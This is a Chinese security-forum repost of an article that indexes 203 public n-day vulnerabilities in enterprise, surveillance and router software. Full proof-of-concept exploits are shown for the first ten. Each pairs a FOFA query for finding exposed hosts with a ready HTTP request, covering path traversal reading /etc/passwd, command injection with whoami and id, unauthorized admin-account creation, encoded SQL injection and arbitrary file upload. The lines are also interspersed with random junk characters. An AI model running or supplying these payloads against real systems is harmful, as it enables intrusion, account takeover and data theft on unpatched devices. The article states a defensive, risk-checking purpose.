中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406
5 X% f* J: t  V' s: n0 }8 v2 Z- Q8 H道一安全 2024-06-05 07:41 北京$ ]4 \& x: p& R0 r
以下文章来源于网络安全新视界 ,作者网络安全新视界5 W$ m7 {; Y) @! L; l6 F

# b/ S1 e7 v# z, h发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
0 O9 C9 v; T3 r/ w* \9 \8 G3 Q9 H+ S' H1 m1 b, B
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。. U, i1 t8 w8 l2 P
% K& X6 C$ r9 b- ~
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。: S8 e1 p% r+ B3 n8 i

+ N3 N' W+ w: b$ u( B% I/ L" Y$ G文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。0 z2 C# t8 q1 Z; w* K3 q. r% S

- X. L0 G) s7 ~1 [: w- z" U  Y7 e4 N( E合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
4 _9 e0 ]# ?4 w
" F% G! X- c! r8 C& U% m5 }# j; k5 G% k1 g# c/ V6 @) w3 `
声明0 n" ?' l* D; \$ r1 R
8 C5 r7 o( V6 h. c" `2 W4 ^
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
% R( D) H2 t5 `9 F  i
  f3 K7 e/ O. @7 @9 }" q有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
, x# z7 i' V" B. G
0 Z# m$ l, @# O$ o* S/ E; J1 e: ^' X# {$ g

! [6 M% L% j! `. G8 E目录
2 g4 @: r0 p5 d1 t% `  V  N, w! R9 F
01& ^1 W* e* ~/ e
2 ^7 @% w0 q" _+ T2 D' U2 n6 g. N) e! Q
1. StarRocks MPP数据库未授权访问8 Q9 `* u; |) m4 G: j
2. Casdoor系统static任意文件读取
* g" A, s# d& q# B" F# P1 `3. EasyCVR智能边缘网关 userlist 信息泄漏
# s$ S0 }7 {$ ?* [& y4. EasyCVR视频管理平台存在任意用户添加0 q3 ^4 L2 G+ T$ x# ?
5. NUUO NVR 视频存储管理设备远程命令执行& k! ?1 c, [; o: A; S
6. 深信服 NGAF 任意文件读取
7 y% r( p" ]& A# o* A4 j7. 鸿运主动安全监控云平台任意文件下载$ Y* j# M- G9 p+ v0 Z, ?
8. 斐讯 Phicomm 路由器RCE1 R  `9 [9 v$ ]+ q8 ]+ Y4 {8 m
9. 稻壳CMS keyword 未授权SQL注入
% Z! |3 j( h% X# m2 Y9 C' u10. 蓝凌EIS智慧协同平台api.aspx任意文件上传- u6 U# f5 F$ B" a8 v
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入: A! d& T  y  h  z$ u
12. Jorani < 1.0.2 远程命令执行
! M; c! W( j) i- t2 M13. 红帆iOffice ioFileDown任意文件读取: Q  ]) v) b7 G1 ^5 c3 C6 v: q
14. 华夏ERP(jshERP)敏感信息泄露
3 q1 z" U' I  b, ~7 f/ o) p15. 华夏ERP getAllList信息泄露
# u6 E$ x; Z; R: I4 A( F16. 红帆HFOffice医微云SQL注入
* {0 n6 P9 t2 S& ]5 r1 e$ }17. 大华 DSS itcBulletin SQL 注入+ n& s% d) s$ W, J
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
, K" |0 H! J" t2 P0 B19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
) z9 _: U; v+ j5 |9 C2 r20. 大华ICC智能物联综合管理平台任意文件读取
3 O" Q4 j8 B3 i21. 大华ICC智能物联综合管理平台random远程代码执行
& j/ Z( G" l* h! e: G' k. N0 n& ?22. 大华ICC智能物联综合管理平台 log4j远程代码执行
' h2 b/ X( U3 E" k3 @7 A23. 大华ICC智能物联综合管理平台 fastjson远程代码执行# {* ^, u1 J! f, y) R  T7 L+ \
24. 用友NC 6.5 accept.jsp任意文件上传& M" s2 z4 F' b! @$ C" D
25. 用友NC registerServlet JNDI 远程代码执行/ l4 W  O2 }8 t/ c0 z3 s7 C
26. 用友NC linkVoucher SQL注入
6 c% S: f4 w2 F; P$ m, l27. 用友 NC showcontent SQL注入0 {6 `* D8 ^3 Y' A8 h
28. 用友NC grouptemplet 任意文件上传
1 o0 U, z' }, D# g6 D29. 用友NC down/bill SQL注入
4 L- p& O7 Y- [. ?30. 用友NC importPml SQL注入
0 B  W& b9 y, _+ H4 i31. 用友NC runStateServlet SQL注入
: \* Q, s( J. f! E3 i- J3 u! y32. 用友NC complainbilldetail SQL注入
! k- J! p, J0 |2 ~+ }33. 用友NC downTax/download SQL注入, Z9 b7 j( z# X& T! k
34. 用友NC warningDetailInfo接口SQL注入/ D% v/ i, d/ r+ O+ m7 x
35. 用友NC-Cloud importhttpscer任意文件上传6 x7 r1 e  G' X
36. 用友NC-Cloud soapFormat XXE
3 y3 k  [3 [" X+ @7 d- v6 _( k1 |37. 用友NC-Cloud IUpdateService XXE' h! ^; V1 X0 ^$ r! K
38. 用友U8 Cloud smartweb2.RPC.d XXE
7 b) {: L' @. R  Q; J5 B39. 用友U8 Cloud RegisterServlet SQL注入
- @) q  O+ L$ X2 r40. 用友U8-Cloud XChangeServlet XXE. I7 a! s, H) D0 W
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
$ {+ V5 F) ^; P; |42. 用友GRP-U8 SmartUpload01 文件上传& T, m2 h  Z& ^
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
/ D/ I4 c! U. S1 z0 d! j9 _44. 用友GRP-U8 bx_dj_check.jsp SQL注入
# v, y& Y! o* {45. 用友GRP-U8 ufgovbank XXE& I9 f: N3 X! R  o- C
46. 用友GRP-U8 sqcxIndex.jsp SQL注入% y% T7 r. p. Z+ R- O$ U
47. 用友GRP A++Cloud 政府财务云 任意文件读取+ P" o- h" n# @5 D9 ?& D- z" g
48. 用友U8 CRM swfupload 任意文件上传
# ]5 a* K( H+ M' H9 H" x9 k49. 用友U8 CRM系统uploadfile.php接口任意文件上传
. Z3 M' a6 t: |50. QDocs Smart School 6.4.1 filterRecords SQL注入; h- t/ R0 M4 }) g- T+ @& q
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入9 G# z$ h  B, D3 b7 c
52. 泛微E-Office json_common.php sql注入
8 ?) G9 W: m# W53. 迪普 DPTech VPN Service 任意文件上传* }9 e6 o) O2 I: {/ K
54. 畅捷通T+ getstorewarehousebystore 远程代码执行' j# s9 O' N2 ]2 w
55. 畅捷通T+ getdecallusers信息泄露; I0 X2 J) _* _0 K
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE' S! b; Y# y* U' K
57. 畅捷通T+ keyEdit.aspx SQL注入
; W9 f5 r/ {- j' T58. 畅捷通T+ KeyInfoList.aspx sql注入
) n  S0 v8 [* \" |" V' S2 \( T) ~59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
0 Y( G3 t3 R+ }/ a7 I: d/ E5 o2 R60. 百卓Smart管理平台 importexport.php SQL注入
6 t0 x+ @, t/ l/ I/ A3 V1 G2 Y! O61. 浙大恩特客户资源管理系统 fileupload 任意文件上传$ @. s; |# c$ t, V! d* b7 ~
62. IP-guard WebServer 远程命令执行
1 U7 W- o3 ^7 T# T63. IP-guard WebServer任意文件读取# w6 X$ s% Y1 N( d
64. 捷诚管理信息系统CWSFinanceCommon SQL注入9 s- @6 @+ P) U3 j* k. n. {& ?
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
# a5 {2 p! K; n  A7 @66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
1 p1 s0 E  N$ |" E# [7 V& S7 [67. 万户ezOFFICE wpsservlet任意文件上传
! C0 h1 a. S9 `68. 万户ezOFFICE wf_printnum.jsp SQL注入" z2 d( U, E3 A, f. Z0 n. \& M
69. 万户 ezOFFICE contract_gd.jsp SQL注入
4 k; e' @" o" W+ F$ _2 K) ^6 R' x70. 万户ezEIP success 命令执行* L- g5 H+ R5 h& N' [
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入7 a- X  U+ w" r* P' S" b
72. 致远OA getAjaxDataServlet XXE
; K7 U. u+ N2 L73. GeoServer wms远程代码执行
( L' g, R; W% g5 x( Z' ?7 i74. 致远M3-server 6_1sp1 反序列化RCE3 o& Q# m0 F1 H
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE& E* D, }5 S% f' z( I  }( F. j
76. 新开普掌上校园服务管理平台service.action远程命令执行
  F4 G9 a6 I& a* x& A1 U- w77. F22服装管理软件系统UploadHandler.ashx任意文件上传
( O# T$ ~: k7 u- b/ U2 s1 b" H78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
6 z' u% O% x( h3 T7 D+ ~9 i79. BYTEVALUE 百为流控路由器远程命令执行
8 Z/ t6 U) d4 \80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
5 `  }" ^# j+ U1 M81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 |) L4 \: f2 M$ f2 J0 e& M0 p
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
! \2 [# _& }! _# D( U: Y; G% m  [( M83. JeecgBoot testConnection 远程命令执行1 T: W% c% A0 k8 @6 j
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入( ~3 Y$ q; z* D: _/ B- p- ~
85. SysAid On-premise< 23.3.36远程代码执行# x! x& t$ o' A% D
86. 日本tosei自助洗衣机RCE
+ M9 |% u4 d: O( f( C9 u# E8 e: x87. 安恒明御安全网关aaa_local_web_preview文件上传
# D. D5 ]0 F) u1 l% a* z6 D7 j5 d88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
' o0 a  u& `6 o! x89. 致远互联FE协作办公平台editflow_manager存在sql注入
+ X; m% E  @9 ~+ o( n" e; G90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行. \' }- q% q7 G) _; O. N- W8 t8 _3 l, t& B
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
1 r0 W6 f* q0 t# ]92. 海康威视运行管理中心session命令执行
& B; V- c, t: L# u$ j4 t: W93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传. V7 m* a$ D; H3 h. Q8 U
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传) g* C5 C0 B5 Y7 B( a% ]
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行8 N  T: h0 x9 G; j$ S" V
96. Apache OFBiz  18.12.11 groovy 远程代码执行7 [4 L7 X* @' E* k  W& I$ J
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行6 U: d5 G. s8 o1 K8 l5 E8 r1 q2 c
98. SpiderFlow爬虫平台远程命令执行# f2 a) G; H" }0 K9 g4 z
99. Ncast盈可视高清智能录播系统busiFacade RCE
# M: P. E( C3 |+ G( @7 V100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
* h% E& }! B' w5 w% ~: j9 J101. ivanti policy secure-22.6命令注入4 R' l8 f2 X4 W7 V* W# b) q
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
3 c( A+ ^7 ?/ v8 M4 I% ?( Q103. Ivanti Pulse Connect Secure VPN XXE" k" f, T) M) w/ n, _, a
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露* y/ {# J& m0 m6 W' D* v
105. SpringBlade v3.2.0 export-user SQL 注入
" G* u% H+ X/ g! T7 O106. SpringBlade dict-biz/list SQL 注入" W& w$ m7 S; [9 W3 U
107. SpringBlade tenant/list SQL 注入
& p" U" ^/ F+ t& \108. D-Tale 3.9.0 SSRF4 o1 K  n  L$ T0 l
109. Jenkins CLI 任意文件读取2 S% f" ^& W" x" [. w
110. Goanywhere MFT 未授权创建管理员
8 U4 e! ^% F/ r1 r3 w' U111. WordPress Plugin HTML5 Video Player SQL注入
2 f7 J! f! h) u. e; {. E112. WordPress Plugin NotificationX SQL 注入5 n: Y. }6 Y7 @( ^
113. WordPress Automatic 插件任意文件下载和SSRF# Q6 d6 u1 H4 {' z
114. WordPress MasterStudy LMS插件 SQL注入
+ k; `$ n* J, i' r; c$ l* V115. WordPress Bricks Builder <= 1.9.6 RCE, `5 a3 b; C4 n. p  }
116. wordpress js-support-ticket文件上传# d' S9 |9 }* O( ~* ^9 o0 R
117. WordPress LayerSlider插件SQL注入
/ M, T0 A* `# W2 ~) X8 t118. 北京百绰智能S210管理平台uploadfile.php任意文件上传2 w" U2 s6 C" N# l8 W2 @
119. 北京百绰智能S20后台sysmanageajax.php sql注入- U* }( j7 I2 x0 b
120. 北京百绰智能S40管理平台导入web.php任意文件上传
" T0 j- X- W; k7 O( @' x121. 北京百绰智能S42管理平台userattestation.php任意文件上传
% j9 z# N7 q: m4 E9 v122. 北京百绰智能s200管理平台/importexport.php sql注入
9 k& Y* z5 f9 f123. Atlassian Confluence 模板注入代码执行
0 B& h- I1 C1 K9 J124. 湖南建研工程质量检测系统任意文件上传
( G  ?( ^2 b! Z$ L125. ConnectWise ScreenConnect身份验证绕过
$ ~! M' j; A3 I& {* N$ |; J0 C126. Aiohttp 路径遍历$ c8 x1 I- D8 ?1 x* R
127. 广联达Linkworks DataExchange.ashx XXE
' B; v" i. c- Z- u  s6 k128. Adobe ColdFusion 反序列化
* o) Z+ Q2 p3 E129. Adobe ColdFusion 任意文件读取
4 ^0 R5 |/ ?4 |0 \; g( i+ |130. Laykefu客服系统任意文件上传
# v, }. F0 ]% ]' t7 z/ L131. Mini-Tmall <=20231017 SQL注入
- h. r6 J- z7 r0 u132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
* U6 l9 i4 \$ u( V- s$ T+ e. W133. H5 云商城 file.php 文件上传! K: P) C: V! l9 S; @4 Z- v
134. 网康NS-ASG应用安全网关index.php sql注入, W" F. B9 C/ ]# G4 \" H8 t6 u
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
! G) N2 l! f$ H' z8 C' a136. NextChat cors SSRF6 L% K- z. E: e0 S) V
137. 福建科立迅通信指挥调度平台down_file.php sql注入* ^: H# o  l; C5 @: F, D( a
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
1 l  K: P) Q2 X139. 福建科立讯通信指挥调度平台editemedia.php sql注入
1 t8 }4 p) w; j( O140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入/ u2 E. i+ ^1 v3 f; H
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入% B5 _5 B* t0 p
142. CMSV6车辆监控平台系统中存在弱密码
( g% B; p" |/ R3 J: T143. Netis WF2780 v2.1.40144 远程命令执行& i& B$ o' E1 W
144. D-Link nas_sharing.cgi 命令注入% u. n5 e; ^- H0 R3 L. Z4 I$ S
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 ]! [  Z7 P) F* c- P1 a; U. i" z+ L146. MajorDoMo thumb.php 未授权远程代码执行9 V2 g1 v( q8 w6 H/ v% [
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
- r5 ]8 |- s) z: E; Y148. CrushFTP 认证绕过模板注入
: h' ]. n& ]8 X  u9 n3 M) R149. AJ-Report开源数据大屏存在远程命令执行9 d0 A- S+ u! C5 k, h( u
150. AJ-Report 1.4.0 认证绕过与远程代码执行' I4 ]5 |3 S4 F
151. AJ-Report 1.4.1 pageList sql注入
' e. `1 H' H3 I9 Z$ j# `+ R152. Progress Kemp LoadMaster 远程命令执行8 I* ?; T2 x4 e3 Z  n1 ]6 [
153. gradio任意文件读取
2 u& l0 @$ a: G% s0 Y154. 天维尔消防救援作战调度平台 SQL注入- c: ?. a( o9 A+ ?
155. 六零导航页 file.php 任意文件上传
& W% \- g- Z* z) ]+ J3 b156. TBK DVR-4104/DVR-4216 操作系统命令注入- x9 _+ ~4 {- W' n; S
157. 美特CRM upload.jsp 任意文件上传
" v& s& X$ W- Z7 S  |) Q6 ^158. Mura-CMS-processAsyncObject存在SQL注入
4 p0 e- `$ U  H* o# k: }# P+ B159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传% W$ H% j8 e3 H) v9 \' Y
160. Sonatype Nexus Repository 3目录遍历与文件读取
4 e) W0 N9 n2 V) \8 D. D1 e161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% }. b. P/ y" x5 I, r) ~; ]' W% _
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传: a5 P  O! c3 u0 L9 n
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传0 w. O6 L% H2 I* B0 j1 m, c2 t
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传* k. C' L4 n, V7 e
165. OrangeHRM 3.3.3 SQL 注入9 X) p" f: Q7 b* Z! v3 r
166. 中成科信票务管理平台SeatMapHandler SQL注入! |/ C, \  r# S% e/ f4 I) P: n5 V
167. 精益价值管理系统 DownLoad.aspx任意文件读取7 ?% T" M6 m/ V6 \( S8 g$ p: i. h
168. 宏景EHR OutputCode 任意文件读取5 [! K9 y! \, h) Q8 W- Y
169. 宏景EHR downlawbase SQL注入
1 Z6 ^) x8 [; L. N9 o0 J8 M( H8 V# u7 w170. 宏景EHR DisplayExcelCustomReport 任意文件读取6 l3 H1 P* S+ C( U( L
171. 通天星CMSV6车载定位监控平台 SQL注入
- I0 ~! d. H% ?8 ]" @- a172. DT-高清车牌识别摄像机任意文件读取( u* h/ W& y1 j. u
173. Check Point 安全网关任意文件读取( p+ T# c4 @/ x& ]8 R( h
174. 金和OA C6 FileDownLoad.aspx 任意文件读取3 S4 @" `$ f& R. o5 e' P4 h$ k
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入0 m. n4 J4 R3 I
176. 电信网关配置管理系统 rewrite.php 文件上传0 T1 v. ]+ Y' i4 h( C0 [
177. H3C路由器敏感信息泄露8 `3 T9 F8 F# I7 v8 a/ D
178. H3C校园网自助服务系统-flexfileupload-任意文件上传2 U. s/ F# _! A% _( y
179. 建文工程管理系统存在任意文件读取
9 U+ T, a- K8 m' A) U) |180. 帮管客 CRM jiliyu SQL注入, V7 w$ V7 x$ s; M
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
* e0 K5 Q. s, }; T" D2 J182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
* x" d( w/ T( z0 l9 e1 B183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
0 P: x2 U7 F5 [184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
9 B) Y. K; }9 [) B185. 瑞友天翼应用虚拟化系统SQL注入
/ E& ]* r6 }* }8 [; B186. F-logic DataCube3 SQL注入$ ^% x5 L- c! z* s' l$ l
187. Mura CMS processAsyncObject SQL注入
" T4 `5 ~3 B0 L4 a; {188. 叁体-佳会视频会议 attachment 任意文件读取
# L; C- T5 d: [3 U189. 蓝网科技临床浏览系统 deleteStudy SQL注入5 J( s- ^$ B3 M6 x* Q5 q5 }  C
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
4 ]& G6 B5 s% c( s9 @: r' Z% G  X191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
6 Z% f* s: b' _! ?192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
9 O4 W8 ]( o! y, V193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行; i  M6 x7 x" t( P9 Y
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传/ g  Z( \. q7 V8 J7 J8 X
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
( `6 v. z0 G' c" d; V( ^0 y7 h196. 河南省风速科技统一认证平台密码重置
$ q7 k! H/ {: G, C1 \) Z4 o! g7 k3 P. }197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" ~7 n! K+ |9 H/ k! t: y% U7 ^% ?6 X198.  阿里云盘 WebDAV 命令注入2 o0 |2 k" D/ p+ R7 {
199. cockpit系统assetsmanager_upload接口 文件上传8 {; w& o% c: ?
200. SeaCMS海洋影视管理系统dmku SQL注入0 a' Q" {8 G$ c
201. 方正全媒体新闻采编系统 binary SQL注入
1 c! q7 e. \$ c5 ?+ Q202. 微擎系统 AccountEdit任意文件上传
4 `1 u7 ~! K0 D6 P5 c- M4 C203. 红海云EHR PtFjk 文件上传
* E! m8 u- Z3 M$ G, L! {1 O9 w, {% A- B+ I- F
POC列表4 i! B8 ]5 M/ N; s8 X0 l. F+ l

2 K( l9 S2 k4 t  J; `) p' |02( V6 G2 P6 U2 L4 a6 v- I, U
/ O: i" o7 ^2 w- i6 ?/ j! H
1. StarRocks MPP数据库未授权访问& ~0 p6 r2 K/ h* N+ m7 B* X+ m$ J# y
FOFA :title="StarRocks"
' s0 ~3 Q6 P& B( u+ I% zGET /mem_tracker HTTP/1.1. d' _7 v3 H# H% z
Host: URL" ^% [. J& ]5 o; I, q# T. Y
: n' d9 O0 w- x8 p; W
: W" W8 X; N5 B5 U" \
2. Casdoor系统static任意文件读取
1 M( a$ |* Q& lFOFA :title="Casdoor"
* i, O5 \" Z# R: v/ E. g& ^8 x* j: GGET /static/../../../../../../../../../../../etc/passwd HTTP/1.14 v* S  J/ I& U8 n" d
Host: xx.xx.xx.xx:9999
& v7 _- j. p' e! YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% D( t5 K- N# f" B8 w* ~+ a
Connection: close
) _! w# F$ O2 ]Accept: */*
; l2 q+ }/ M8 _* ^" v/ nAccept-Language: en. d  m5 E) r0 z8 w4 Q
Accept-Encoding: gzip
* E6 w4 Y, Z( r
. _" J( h! o2 H% f% ?% Q# l6 m$ ]0 C2 A$ h
3. EasyCVR智能边缘网关 userlist 信息泄漏
2 o. `4 i: b# r2 v2 c0 @FOFA :title="EasyCVR"
, G$ p* M- E2 a7 hGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
2 ^/ `. V' @, A9 zHost: xx.xx.xx.xx
9 `5 B7 K% ?# |, ]/ E
! p, T: E7 W# R0 g2 T' D. M; P8 M6 j9 b2 t% c
4. EasyCVR视频管理平台存在任意用户添加
( H2 P# A, Z. V7 z4 ]- k* P% PFOFA :title="EasyCVR"% h8 J" c  J9 |6 W0 p) X
" `- X5 C1 a6 o4 b) m
password更改为自己的密码md5
$ Z- t  J8 n* Q  J( [POST /api/v1/adduser HTTP/1.1
3 j4 r4 r1 A- U  e4 ?. z7 S7 ?2 sHost: your-ip9 L4 S& }1 w+ b) P7 N( v: x# J
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
7 X2 c4 ~1 s/ L) Q3 B: F& i8 d1 f1 x& d  P! H& Z
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
4 A0 y  N: j# `. t7 G0 ?/ ?
/ g7 u) F) v* K* M$ H( R6 {
9 T" C- V6 l, h- C5. NUUO NVR 视频存储管理设备远程命令执行
* ?8 z- t! r& k8 A) ~; jFOFA:title="Network Video Recorder Login"6 N1 c/ s* H" Z# v" r+ E
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
9 k  w1 a( e* B4 i5 N# q; V! z& MHost: xx.xx.xx.xx
9 g' d: g! W. Z  B
3 t( k4 M$ Z4 k0 b- j/ `
: S- d% A1 C  q) D# O& I. [: m4 n, a6. 深信服 NGAF 任意文件读取$ c+ b6 W0 G8 ~6 R6 K$ Q) ?2 c
FOFA:title="SANGFOR | NGAF"
4 {0 ^% a- o7 ~9 w4 }2 m8 t/ u5 n7 oGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.13 c+ @9 @% P) P- D% Q
Host:
, A% S' @" T2 \& S* b8 P, h$ O: T9 A! w0 M' N+ P: B$ C

+ Y* Z  N" }6 Q& w8 w& t7. 鸿运主动安全监控云平台任意文件下载; p3 K! ~+ s8 ~0 T- S. j
FOFA:body="./open/webApi.html"
: k6 \) E" f: E) {0 {/ L- D* rGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
. j( _6 r/ P# \7 Z4 k' sHost:! H3 O% I+ |  l

) K5 _% M$ o1 w- h' ?* g* u: b( Y0 y( z! t, {6 P0 v1 e0 P! v  ]
8. 斐讯 Phicomm 路由器RCE. x& k" \& r" F, W; E
FOFA:icon_hash="-1344736688"" q' J- V; ]' d# l3 P9 n0 F
默认账号admin登录后台后,执行操作
& r4 d% A! f- h4 V) g# L' W: M" EPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1( ?! e3 Q% J: U: _9 s
Host: x.x.x.x5 y2 Z3 H. r6 B  p5 X; k
Cookie: sysauth=第一步登录获取的cookie# c0 ?+ {6 r3 f" L+ g1 x$ W0 B" S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
( y, q1 _" v5 TUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 x2 c8 m1 d8 g9 f9 Q
* R+ \* |' b; h
------WebKitFormBoundaryxbgjoytz
: o& _& ]' X% jContent-Disposition: form-data; name="wifiRebootEnablestatus"
  ?& o: Z% I7 N: c  U) m) Y% f% j. B- x
%s! d% i. i8 l: z' C$ h) s: _
------WebKitFormBoundaryxbgjoytz
1 |0 p( m7 A3 ]1 M( N- H: bContent-Disposition: form-data; name="wifiRebootrange"
6 K5 C  l0 S( V+ _# ~
  t" `' F9 P1 D: Q2 e; t, `12:00; id;! _$ _" R/ Q2 N' z( U
------WebKitFormBoundaryxbgjoytz
" j& H+ l$ A* H, W- GContent-Disposition: form-data; name="wifiRebootendrange"( i! C3 O% H9 `- B: G6 E* m
: g- m: _1 C; b% z
%s:
* t* }  V7 s/ K2 ?' G------WebKitFormBoundaryxbgjoytz6 o+ H$ o$ |( r  O% v
Content-Disposition: form-data; name="cururl2"% m8 a( P7 }& h8 X# w

' o( u5 ~. r7 r" `, o: F
1 x2 B) B" T! m3 l3 H------WebKitFormBoundaryxbgjoytz--
: ]: Y" q4 |) l- d; i$ T+ z( h8 y
: V' M- s: f4 I" z3 w3 g* t
9. 稻壳CMS keyword 未授权SQL注入
! h( d# q! R3 j: D, V$ f( T) yFOFA:app="Doccms". q! T/ h+ U0 X6 P& u) a
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.19 b( o3 z1 l1 j. p% `
Host: x.x.x.x8 f, J' `2 `, R6 R/ Y6 G1 P/ }
- J0 }" P9 w+ x  V
" s' _! w& n7 N8 A5 i1 D
payload为下列语句的二次Url编码1 z' o, I6 z) K, ]! t! ?
% L5 d; V- J, ?$ a0 F/ `% e
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#1 h7 r9 B4 B/ `8 `4 Y! P
3 N* x$ |. @& J  C, [5 |( V' {
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
% P" ?) v$ ~, x4 mFOFA:icon_hash="953405444"
, N9 H% O/ ~9 w, W2 s  ~4 {
# v+ z% f. ~4 P3 l文件上传后响应中包含上传文件的路径
9 ]$ w* O8 P9 O. [POST /eis/service/api.aspx?action=saveImg HTTP/1.19 }* z5 k. j# M0 J5 `- r+ R4 ?7 k
Host: x.x.x.x:xx
1 [* G$ z' d+ e5 I6 g( SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.367 [) Q4 a% M! x0 u
Content-Length: 197
% \# e' s! G( u1 q+ rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
9 l- C. E  M9 {3 ]& h2 kAccept-Encoding: gzip, deflate
, M# D9 G* o; BAccept-Language: zh-CN,zh;q=0.96 L7 v. C- M9 T) C+ f
Connection: close
2 l9 Y" C" m, \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
6 _/ {# U% r: |8 R6 N
6 T$ y7 m4 Y: m3 h3 b6 ]------WebKitFormBoundaryxdgaqmqu
' S! j: b  ^- `Content-Disposition: form-data; name="file"filename="icfitnya.txt"
* \4 Z/ _' l$ Q* l- j; KContent-Type: text/html- T6 k' I- Z0 G1 X7 ?$ C% I7 i( |

* w3 r+ J2 ]% rjmnqjfdsupxgfidopeixbgsxbf$ }$ f) o& R' G/ Z! s: f
------WebKitFormBoundaryxdgaqmqu--
) G* E% g4 N$ u- Z( t# z7 R) z& [) r4 c! X  I1 z* W

